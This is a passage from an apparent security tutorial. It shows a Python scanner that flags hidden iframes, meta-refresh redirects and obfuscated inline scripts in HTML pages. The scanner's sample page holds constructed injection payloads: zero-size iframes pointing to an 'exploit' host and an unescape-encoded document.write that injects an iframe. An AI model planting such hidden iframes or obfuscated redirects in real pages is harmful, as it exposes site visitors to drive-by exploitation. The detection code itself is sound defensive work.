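        self._script_chunks: List[str] = []

    def handle_starttag(self, tag: str, attrs: List[Tuple[str, Optional[str]]]) -> None:
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe" and _iframe_is_hidden(a):
            self.findings.append({"kind": "hidden-iframe", "target": a.get("src", "")})
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\";]+)", a.get("content", ""), re.I)
            target = m.group(1).strip() if m else a.get("content", "")
            self.findings.append({"kind": "meta-refresh", "target": target})
        elif tag == "script":
            self._in_script, self._script_chunks = True, []

    def handle_data(self, data: str) -> None:
        if self._in_script:
            self._script_chunks.append(data)

    def handle_endtag(self, tag: str) -> None:
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_chunks)
            escapes = len(ESCAPE_RE.findall(body))
            markers = [m for m in OBFUSCATION_MARKERS if m in body.lower()]
            if markers and escapes >= MIN_ESCAPES:
                self.findings.append({"kind": "obfuscated-script",
                                      "target": f"{len(markers)} marker(s), {escapes} escaped bytes"})

def scan(html: str) -> List[Dict[str, str]]:
    """Return the list of suspicious redirections found in `html`."""
    p = RedirectScanner()
    p.feed(html)
    p.close()
    return p.findings

# Constructed sample page: one visible embed, two hidden iframes, a meta
# refresh, a benign inline script and an obfuscated document.write.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; URL=http://redirect.example.invalid/landing">
</head><body>
<h1>Reality show winners</h1>
<script>var page = "winners"; console.log(page);</script>
<iframe src="https://video.example.invalid/embed" width="640" height="360"></iframe>
<iframe src="http://exploit.example.invalid/ie.html" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://exploit.example.invalid/ie2.html" style="display:none; position:absolute"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%65%78%2E%69%6E%76%61%6C%69%64%22%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan(SAMPLE_PAGE):
        print(f"{f['kind']}: {f['target']}")
```

Run it over a saved copy of a suspect page (or over a crawl of your own site after a compromise) and the “target” field gives you the domains to block and to look for in proxy logs; the visible video embed in the sample is left alone, which is the false-positive case any such heuristic has to get right.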


